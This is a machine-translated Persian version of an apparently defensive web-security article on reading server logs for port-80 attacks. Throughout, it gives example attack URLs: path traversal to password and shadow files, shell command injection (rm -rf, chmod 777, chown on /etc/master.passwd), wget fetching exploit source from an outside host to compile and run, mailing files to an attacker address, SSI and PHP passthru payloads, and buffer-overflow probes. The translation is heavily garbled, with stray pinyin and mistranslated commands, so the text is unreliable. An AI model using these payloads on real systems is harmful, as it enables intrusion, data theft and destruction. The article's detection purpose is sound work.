I. خلاصه
دوم است. شرح مفصل
سوم نیز از دیگر
چهارم. Spillover تجزیه و تحلیل
V. Transcoding
ششم نتیجه گیری
[خلاصه]
پورت پیش فرض وب سایت در تاریخ 80 تا مشکلات امنیتی مختلف آن خدمت ادامه به آنها آزادی ، حتی برخی از این آسیب پذیری اجازه می دهد مهاجم برای به دست آوردن سیستم امتیازات مدیر سایت نظر خود را وارد کنید ، پس از بندر Zenomorph است 80 حمله به برخی از آثار پژوهش ، و به شما بگویم که چگونه برای پیدا کردن مشکلات از پرونده وارد شوید.
[جزئیات
اینجا ، در بخشی را از طریق تعداد نمایش Liezi در سرورهای وب و برنامه های کاربردی در حمله عمومی خود ، و آثار آن است ، که نشان دهنده تنها Liezi حمله بزرگ ، هیچ لیست تمام صورت حمله وجود دارد ، از این بخش را خواهد شد شرح دقیقی از نقش هر حمله کرده ، و آن که چگونه بهره برداری از این آسیب پذیری برای حمله به.
(1) "." ".." و درخواست "..."
آثار این حملات بسیار رایج برای برنامه های کاربردی وب و سرویس دهنده وب ، استفاده می شود که به مهاجم اجازه می دهد کرم یا ویروس برنامه ای برای تغییر مسیر سرویس دهنده وب ، دسترسی به مناطق بسته به دست خوهد آورد. اغلب برنامه های CGI با این معایب ، ".." درخواست.
به عنوان مثال :
http://host/cgi-bin/lame.cgi؟file=../../../../etc/motd
این نشان می دهد مهاجم درخواست Liezi mosd این فایل ، اگر مهاجم توانایی دستیابی به موفقیت در وب سایت و سرور را در فهرست ریشه ، سپس به دست آوردن اطلاعات بیشتر و برای به دست آوردن امتیازات بیشتر است.
(2) "20 ٪" درخواست
٪ 20 ارزش سحر و جادو است که فضاهای 16 ، گرچه این به آن معنا نیست که شما می توانید هر چیزی استفاده کنید ، اما در هنگام مشاهده شما وارد بخش مدیریت شوید که آن را پیدا خواهد کرد ، برخی از برنامه وب سرور در حال اجرا بر روی این شخصیت ممکن است به طور موثر اجرا شده است بنابراین ، شما باید با دقت وارد بررسی. در سوی دیگر ، گاهی درخواست می توانید به انجام بعضی از دستورات کمک کند.
به عنوان مثال :
http://host/cgi-bin/lame.cgi؟page=ls ٪ | 20 - القاعده
این نشان می دهد Liezi مهاجم به اجرای فرمان یونیکس ، لیست فروشگاه تمام اسناد مورد درخواست ، و باعث حمله به دسترسی به فایل های مهم بر روی سیستم شما ، تا به او کمک بیشتر را فراهم شرایط برای به دست آوردن امتیازات.
(3) "00 ٪" درخواست
٪ 00 گفت : 16 مبنای شانزده بایت خالی ، او قادر به احمق برنامه وب ، و درخواست انواع مختلف فایل های.
مثالها :
http://host/cgi-bin/lame.cgi؟page=index.html
ممکن است این درخواست معتبر در ماشین ، در صورت حمله آگاه از این درخواست با موفقیت انجام شد ، او بیشتر برای روش های cgi نگاه کنند.
http://host/cgi-bin/lame.cgi؟page=../../../../etc/motd
شاید برنامه cgi می کند این درخواست را قبول نمی کند چرا که درخواست برای بررسی پسوند نام فایل ، مانند : انواع html.shtml و یا سایر فایل های. اکثر برنامه های شما را به درخواست نوع فایل اشتباه است ، این زمانی که مهاجم که درخواست فایل باید نوع فایل را به پسوند شخصیت بگویم ، تا مهاجم می تواند مسیر سیستم ، دریافت نام فایل و در نتیجه سیستم شما اطلاعات حساس تر
00html ٪ http://host/cgi-bin/lame.cgi؟page=../../../../etc/motd
توجه به این درخواست ، آن برنامه cgi که که این سند به منظور تعیین نوع فایل قابل قبول تقلب ، بعضی از برنامههای کاربردی از بازرسی های موثر به عنوان فایل درخواست احمقانه ، که معمولا استفاده می شود روش های مهاجم.
(4) "|" درخواست
این شخصیت لوله است ، در سیستم یونیکس ، درخواست برای کمک در اجرای دستورات سیستم چند در همان زمان.
به عنوان مثال :
# گربه access_log | grep - من ".."
(این دستور ورود به سیستم ".." درخواست ، به طور معمول در حملات و کرم ها استفاده می شود صفحه نمایش در بر داشت)
اغلب پیدا کردن برنامه های کاربردی وب که بسیاری از استفاده از این شخصیت ، این هم به آلارم کاذب در شناسه منجر لاگ.
در بررسی دقیق درخواست شما ، بنابراین استفاده از کاهش آلارم کاذب در سیستم های تشخیص نفوذ.
در اینجا برخی از Lieh - tzu :
http://host/cgi-bin/lame.cgi؟page=../../../../bin/ls |
این فرمان درخواست ، دنبال برخی تغییرات در Liezi
http://host/cgi-bin/lame.cgi؟page=../../../../bin/ls ٪ 20 - القاعده 20/etc |
این درخواست در سیستم یونیکس فهرست / پوشه و غیره از تمام فایل ها
٪ http://host/cgi-bin/lame.cgi؟page=cat 20access_log ٪ grep | 20 - 20 ٪ من "لنگ"
گربه فرمان درخواست اجرا و پیاده سازی از دستور grep همچنین ، بررسی کنید لنگ ""
(5) "؛" درخواست
در سیستم های یونیکس ، این کاراکتر اجازه می دهد تا چندین خط فرمان اعدام
به عنوان مثال :
# کد ؛ uname -
(اجرای فرمان گرفتن شناسه (شماره ، پس از اجرای دستور uname)
برخی از برنامه های وب را با این شخصیت ، ممکن است شناسه شما نتیجه سیاهههای مربوط اخطار شکست ، شما باید با دقت برنامه های وب شما را بررسی خطر شکست هشدار شناسه شما را کاهش دهد.
(6) " " و " " درخواست
باید چک سیاهههای مربوط به شما را ثبت دو کاراکتر ، به چند دلیل ، یکی از اولین شخصیت که در ارسال داده ها در سند
مثال 1 :
# اکو "شما hax0red H0 H0" / و غیره / motd (درخواست motd نوشته شده است اطلاعات در این سند)
مهاجم به راحتی می توانید درخواست همانطور که در بالا با دستکاری صفحه وب خود استفاده کنید. چنین به عنوان RDS معروف بهره برداری مهاجم اغلب مورد استفاده برای تغییر صفحه وب است.
مثال 2 :
٪ http://host/something.php=Hi 20mom ٪ 20Im ٪ 20Bold!
نسخه متنی شما متوجه خواهید شد که زبان از نشانه های اینجا ، او نیز صرف حرف " "،" "، چنین حملاتی می تواند باعث ایجاد حمله برای دسترسی به سیستم ، آن را اشتباه مردم فکر می کنم این قانونی اطلاعات وب سایت (که منجر به مردم ببینید این لینک را برای دیدار مهاجم به آدرس تعیین می کنند ، این درخواست ممکن است به شخصیت های سحر و جادو 16 در فرم کد گذاری شده ، به طوری که اثری از حمله به قدری واضح نیست)
(7) "!" درخواست
زبان مشترک در مورد این شخصیت درخواست اس اس (سرور های جانبی شامل) من حمله ، حمله است اگر مهاجم گیج کاربر کلیک مجموعه لینک ، و همانند بالا.
به عنوان مثال :
http://host1/something.php =
Lieh - tzu است مهاجم ممکن است آن را به یک فایل در سایت host2 از host1 انجام به نظر می رسد در بالا (البته ، نیاز به بازدید کننده ای برای دیدار مهاجم تنظیمات اتصال. این درخواست ممکن است تبدیل به 16 سحر و جادو ماسک را پشتیبانی می کند ، به راحتی یافت نمی شود)
در عین حال ، این روش همچنین می توانید فرمان مقام وب سایت اجرا
به عنوان مثال :
http://host/something.php =
Lieh - اجرا بر روی سیستم از راه دور "شناسه" دستور ، آن شناسه کاربر وب سایت ، صفحه نمایش معمولا "هیچ کس" یا "www"
این فرم همچنین اجازه می دهد تا شامل فایل های پنهان است.
به عنوان مثال :
http://host/something.php =
فایل های پنهان است. Htpasswd نمایش داده نمی شوند ، رد خواهد آپاچی برای ایجاد چنین قوانین به. Ht فرم درخواست ، و آرم شمسی خواهد شد محدودیت های همچون دور زدن ، و منجر به مشکلات امنیتی
(8) "،" درخواست
حملات چنین استفاده می شود را امتحان کنید تا از راه دور به روش های پی اچ پی برنامه وب ، ممکن است حکم اعدام ، اجازه می دهد بسته به تنظیمات سرور ، و کار های دیگر از عوامل متعددی (مانند پی اچ پی می باشد به حالت امن مجموعه)
به عنوان مثال : http://host/something.php passthru = ("")؛؟ شناسه
در برخی از برنامه ساده پی اچ پی ، ممکن است به یک سایت در مورد حقوق سیستم کاربر از راه دور به انجام فرمان محلی
(9) "` "درخواست
این شخصیت بعد مورد استفاده برای اجرای دستورات در پرل ، شخصیت در برنامه وب می باشد که اغلب استفاده نمی شود ، بنابراین اگر شما آن را ببینید در سیاهه خود ، باید بسیار مراقب باشید
به عنوان مثال :
http://host/something.cgi = `شناسه`
نوشتن برنامه پرل cgi در سوال خواهد به اجرای فرمان گرفتن شناسه (شماره سرب
[بیشتر]
بخش زیر خواهد اجرای حملات بیشتر می تواند دستور مورد بحث ، همراه با اسناد مورد درخواست ، و اگر شما از راه دور فرمان عیب اعدام ، باید برای بررسی چگونگی کشف. این بخش تنها برای شما ایده خوبی بدهد ، و به سیستم شما چه اتفاق می افتد ، مهاجمان سعی در حمله به ردهای از سیستم شما می توانید تمام آن را از حمله به استفاده از دستورات و درخواست ها لیست نیست.
"/ بن / ls"
درخواست این دستور مسیر کل ، در برنامه های وب بسیاری از این روزنه ، اگر شما در بسیاری از جاها از جمله درخواست ورود به سیستم ، ممکن است برای بزرگ آسیب پذیری اجرای فرمان از راه دور است ، اما نه لزوما مشکل نیز ممکن است هشدار اشتباه باشد. یکبار دیگر یادآور شده است ، برنامه وب نوشته شده است (cgi ، افعی ، پی اچ پی و غیره...) است بر اساس امنیت
به عنوان مثال :
http://host/cgi-bin/bad.cgi؟doh=../../../../bin/ls ٪ | 20 - القاعده
http://host/cgi-bin/bad.cgi؟doh=ls ٪ 20 - آل ؛
"cmd.exe"
این پنجره پوسته ، در صورت حمله به دسترسی و اجرا این اسکریپت بر روی سرور به مجموعه شرایط به اجازه پنجره ماشین شانگ شیا Ke یی Zuo در هر ماده است ، کرم Bingdujiushi Henduo بیش از پورت 80 ، دستگاه های ارتباطی صوتی یوان چنگ است
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe؟dir+e :
"/ بن / شناسه"
این دو فایل باینری ، این مشکل و / بن / ls ، مانند ، اگر شما وارد بخش مدیریت شوید بسیاری از جاها Zhezhong درخواست امکان وجود دارد 很大 Yuanchengzhixing فرماندهی آسیب پذیری ، اما نه لزوما مشکل نیز ممکن است هشدار اشتباه باشد.
این نشان خواهد داد که بخشی که به آن تعلق دارد به کاربر و گروه
به عنوان مثال :
| http://host/cgi-bin/bad.cgi؟doh=../../../../bin/id
http://host/cgi-bin/bad.cgi؟doh=id ؛
"/ بن / rm"
این فرمان می توانید فایل های بدون استفاده صحیح حذف شده است بسیار خطرناک
مثالها :
http://host/cgi-bin/bad.cgi؟doh=../../../../bin/rm ٪ 20 ٪ 20 - رادیویی * |
http://host/cgi-bin/bad.cgi؟doh=rm ٪ 20 رادیویی ٪ 20 - * ؛
"Wget tftp و" فرمان
این دستورات معمولا مهاجم ممکن است دسترسی بیشتر به دانلود فایل های اضافه ، wget است تحت فرمان یونیکس ، ممکن است مورد استفاده قرار گیرد برای دانلود backdoors ، tftp است که تحت فرمان یونیکس و nt ، استفاده می شود برای دانلود فایل. برخی از کرم ها خود مؤسسه توسط tftp گسترش کپی ویروس به میزبان دیگر
مثالها :
20http ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../path/to-wget/wget : / / host2/Phantasmp.c | http:// میزبان / cgi - بن / bad.cgi؟ doh = wget ٪ 20http : / / www.hwa-security.net/Phantasmp.c ؛
"گربه" فرمان
این دستور استفاده می شود برای مشاهده محتویات پرونده ، برای خواندن اطلاعات مهم ، مانند فایلهای پیکربندی ، فایل ها رمز ، فایل های اعتباری و مدارک شما می توانید فکر می کنم از
مثال : ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi؟ doh = ٪ گربه 20/etc/motd ؛
"اکو" فرمان
این دستور مورد استفاده برای نوشتن داده ها به فایل ، مانند "index.html"
مثالها : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/echo ٪ 20 "باشگاه فوتبال - # kiwis ٪ 20was ٪ 20here" ٪ 20 ٪ | 200day.txt http://host/cgi-bin/bad.cgi؟doh=echo ٪ 20 "باشگاه فوتبال - # kiwis ٪ 20was ٪ 20here" ٪ 20 ٪ 200day.txt ؛
"ص" فرمان
فهرست روند در حال حاضر در حال اجرا ، به مهاجم که میزبان از راه دور در حال اجرا در نرم افزار به منظور رسیدن به ایده ای از مسائل امنیتی ، برای به دست آوردن مجوز های بیشتر
مثالها : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/ps ٪ | 20 - aux http://host/cgi-bin/bad. cgi؟ doh = ٪ - aux ص 20 ؛
"کشتار و killall" فرمان
سیستم های یونیکس در جهت کشتن این روند ، مهاجم می تواند این دستور برای جلوگیری از خدمات سیستم و پروسه استفاده می تواند همچنین پاک کردن آثار حمله ، برخی از بهره برداری خواهد شد بسیاری از فرآیندهای تولید فرزند
مثال : ٪ 20-9 ٪ http://host/cgi-bin/bad.cgi؟doh=../bin/kill 200 | http://host/cgi-bin/bad.cgi؟doh=kill ٪ 20 -9 ٪ 200 ؛
"Uname" فرمان
این دستور می گوید که مهاجم نام دستگاه راه دور ، برای مدتی ، از طریق این وب سایت به منظور دانم که isp ، مهاجم که ممکن است تعداد بازدید امروز Uname - درخواست به طور معمول ، این خواهد شد ورود به سیستم ثبت فایل
مثال : ٪ 20 - http://host/cgi-bin/bad.cgi؟doh=../../../../bin/uname | http://host/cgi-bin/bad. cgi؟ doh = ٪ uname - 20 ؛
"رونوشت ، شورای همکاری خلیج فارس ، پرل ، پایتون ، و غیره..." تلفیقی / تفسیر فرمان
Wget tftp و یا توسط مهاجم برای دانلود بهره برداری و استفاده از سی سی ، کامپایلر شورای همکاری خلیج فارس به کامپایل کردن این برنامه به اجرایی ، دسترسی و امتیازات بیشتر
مثالها : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/cc ٪ 20Phantasmp.c | http://host/cgi-bin/bad. cgi؟ doh = ٪ 20Phantasmp.c شورای همکاری خلیج فارس ؛. / a.out ٪ 20 ٪ فسفر 2،031،337 ؛
اگر شما مشاهده لاگ در "پرل" پیتون "این دستورالعمل در بر داشت ممکن است حمله از راه دور برای دانلود پرل ، پایتون اسکریپت ، در دادگاه محاکمه و به دریافت امتیازات محلی
"ایمیل" دستورات
حمله اغلب به استفاده از این سیستم فرمان ، برخی از اسناد مهم را به صندوق پستی خود مهاجم نیست ، بلکه تمایل به ایمیل حملات بمب هستند انجام
مثال : ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/mail 20attacker@fuckcnhonker.org ٪ 20
2.168.22.1 ؛
"Chown ، سطح دسترسی ، chgrp ، chsh ، و غیره..." و دستورات دیگر
سیستم های یونیکس در جهت به آنها اجازه تغییر مجوز فایل
chown = اجازه می دهد تعیین سطح دسترسی صاحب فایل = اجازه می دهد تا به مجموعه chgrp فایل مجوزهای = اجازه می دهد تا مالک را تغییر مجوز فایل ها در گروه chsh = اجازه تغییر پوسته کاربر
مثالها : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/chmod ٪ 20777 ٪ 20index.html | http://host/cgi-bin/ bad.cgi؟ doh = ٪ 20777 ٪ سطح دسترسی 20index.html ؛ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/chown 20zeno ٪ 20 / و غیره / master.passwd ٪ http://host/cgi-bin/bad.cgi؟doh=chsh | 20/bin/sh ؛ http://host/cgi-bin/bad.cgi؟doh=../. . /.. /.. / بن / chgrp ٪ ٪ 20nobody | 20/etc/shadow
"/ غیره / passwd" فایل
رمز عبور این فایل سیستم ، معمولا سایه خاموش است ، و اجازه نمی دهد که رمز عبور رمز شده برای دیدن ، ولی برای مهاجم که می توانند آنچه معتبر است کاربر ، و مسیر مطلق سیستم ، نام سایت و سایر اطلاعات ، معمولا به عنوان توسط سایه خاموش ، تا مهاجم معمولا / و غیره را مشاهده کنید فایل / سایه
"/ غیره / master.passwd"
این پرونده در BSD فایل سیستم رمز عبور ، حاوی رمز عبور رمز شده ، فایل را در حساب ریشه فقط فقط خواندنی ، و برخی از مهاجمان غیر ماهر باز تلاش خود را برای خواندن مطالب در داخل ، اگر وب سایت می باشد دسترسی ریشه برای اجرا ، سپس مهاجم است ، ما می توانیم در داخل مطالب را بخواند ، بسیاری از مشکلات از مدیر سیستم در تاریخ خواهد بود یکی پس از دیگری می آیند
"/ غیره / سایه"
سیستم دارای رمز عبور برای حساب همان ریشه فقط خواندنی رمز و / همکاران / master.passwd تقریبا
"/ غیره / motd"
وقتی کاربران به سیستم یونیکس ورود به سیستم ، اطلاعات به نظر می رسد ، در پیام "از روز" فایل ، آن را فراهم می کند اطلاعات مهم سیستم و مدیریت کاربران برخی از مجموعه ، کاربران که مایل به دیدن آن ندارند ، همچنین دارای سیستم اطلاعات نسخه ، مهاجم معمولا مراجعه به این فایل ، به درک سیستم در حال اجرا است در حمله ، گام بعدی این است که برای این نوع از سیستم ، بهره برداری از جستجو ، و دسترسی بیشتر به سیستم امتیازات
"/ غیره / میزبان"
سند فراهم می کند آدرس آی و شبکه اطلاع رسانی ، مهاجم می توانید اطلاعات بیشتری در مورد تنظیمات شبکه سیستم یادگیری
"/ Usr / محلی / آپاچی / کنفرانس / httpd.conf"
این وب سرور آپاچی فایل پیکربندی ، مهاجم می تواند درک ، مانند cgi ، شمسی و دیگر اطلاعات قابل دسترسی است
"/ غیره / inetd.conf"
بله این سرویس inetd فایل پیکربندی ، مهاجم می تواند از راه دور دستگاه Naxie خدمات Qidong ، یاد بگیرند که آیا سوال لو لفاف کنترل دسترسی ، اگر فا لفاف Xian Yunxing مهاجم بعدی هوی Jian چا "/ و... / hosts.allow" و "/ و... /" hosts.deny ، فایل ، که ممکن است برخی از تنظیمات ، تغییر امتیازات دسترسی
". Htpasswd. Htaccess ، و. Htgroup"
این فایل ها معمولا در وب سایت کاربر احراز هویت استفاده می شود ، مهاجم می خواهم این فایل ، مشاهده و به دست آوردن نام کاربری و رمز عبور ، رمز عبور فایل. Htpasswd رمزگذاری شده است ، از طریق شکستن برخی از فرآیند رمزگشایی ساده ، مهاجم اجازه می دهد برای دسترسی به سایت مناطق حفاظت شده (معمولا کاربر با همان نام کاربر و رمز عبور ، مهاجم حتی می تواند به حساب دیگر بازدید)
"Access_log و error_log"
اینها آپاچی سرور فایل های ورود به سیستم ، حمله اغلب مشاهده این فایل ها ، نگاهی به آن درخواست شما ثبت آن و سایر درخواست ها برای مکان های مختلف
به طور معمول ، حمله خواهد کرد این فایل ها ورود به سیستم ، مانند آدرس اطلاعات خود را خود ، یک وقفه مهاجم را از طریق پورت 80 روی سیستم شما و سیستم شما را تغییر دهید تا به هیچ پشتیبان از کار ، و بدون رسیدگی به پرونده های دیگر از رکورد وضعیت سیستم ، که می تواند تشخیص نفوذگر می شود بسیار دشوار است به کار
"[حرف درایو] : winntrepairsam._ یا [رانندگی حرفی] : winntrepairsam"
ویندوز NT فایل سیستم رمز عبور ، اگر فرمان از راه دور را نمی توان اجرا ، حمله معمولا این اسناد ، درخواست و سپس "ترک" l0pht از نوع رمز عبور کرک ابزار کرک ، اگر مهاجم سعی می کند برای حمله به فایل کلمه عبور ، در صورت موفق و سپس دستگاه از راه دور خواهد شد مهاجم می شود کنترل
[تجزیه و تحلیل سرریز]
در این مقاله ، من زیاد در مورد سرریز از موضوع گفت : نه ، من خواهد داد که چه کسانی پدیده و آثار قابل توجه و نگرانی خاص ، بافر معمولا توسط مهاجم و transcoding و راههای دیگری برای دستیابی آسان پیدا حمله
در اینجا دروغ ساده زی
به عنوان مثال : http://host/cgi-bin/helloworld؟type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AA
این Liezi نشان می دهد مهاجم در یک برنامه کاربردی برای ارسال تعداد زیادی از شخصیت ، برنامه ای برای تست سرریز بافر ، سرریز بافر می تواند از راه دور فرمان اعدام مجوز های میزبان ، گرفتن اگر مالک است setuid و روش برای ریشه ، از طریق سرریز می تواند دسترسی به کل سیستم ، گرفتن اگر نه مثل برنامه setuid ، سپس سرریز در حال اجرا است که فقط توسط وب سایت کاربر حقوق
در اینجا می توانید تمام شرایط نگو ، اما شما باید به طور منظم بررسی پرونده شما وارد بخش مدیریت شوید ، اگر در آن روز ، ناگهان در بر داشت بسیاری از درخواست است ، اما معمولا نه بیشتر از درخواست ، آن معنی است که شما به حملات سرریز ، البته در معرض ، همچنین ممکن است شبکه جدید حمله کرم
[Transcoding]
همه حملات در بالا ذکر شد درخواست ، مهاجم معمولا می داند سیستم شناسه اغلب مکانیکی درخواست چک ، معمولا حمله خواهد کرد استفاده از ابزار تبدیل فرمت محتوای درخواست 16 گروه برای تبدیل و در نتیجه شناسه خواهد این درخواست ها را نادیده بگیرد ، ما آشنا هستند با آسیب پذیری ابزار اسکن CGI است که خوب Liezi شارب. اگر شما مشاهده لاگ هم در بر داشت تعداد زیادی از 16 باند و نه برخی از شخصیت های مشترک و سپس مهاجم ممکن است سعی به استفاده از بعضی از راه هایی را برای حمله به سیستم شما
راه ورود خود را سریع فایل درخواستی برای ایجاد آن سحر و جادو 16 است ، کپی آن را به مرورگر شما ، مرورگر می تواند به درخواست حق تبدیل و نمایش داده محتویات درخواست ، اگر اینکار را نکنید شجاعت را به این خطر ، ساده مرد اسکی ، می تواند شما را با کد صحیح ارائه دهد.
[] نتیجه گیری
در متن این مقاله می توانید تمام پورت 80 از حمله را پوشش نمی دهد ، اما بیشتر آنها شده است اشاره کرد بیش از حمله به طور کلی ، و شما بگویید که چگونه برای بررسی فایل های لاگ خود ، و نحوه اضافه کردن مانند تعدادی از قواعد شناسه ، نوشتن هدف او این است که وب سایت مدیر سیستم باید در مورد چه فکر خوبی در عین حال ، من امیدوارم که این مقاله کمک می کند تا برنامه وب توسعه دهندگان وب برای نوشتن برنامه های بهتر نگران
توجه : اگر شما هر گونه نظرات و پیشنهادات خود ، لطفا admin@cgisecurity.com ایمیل.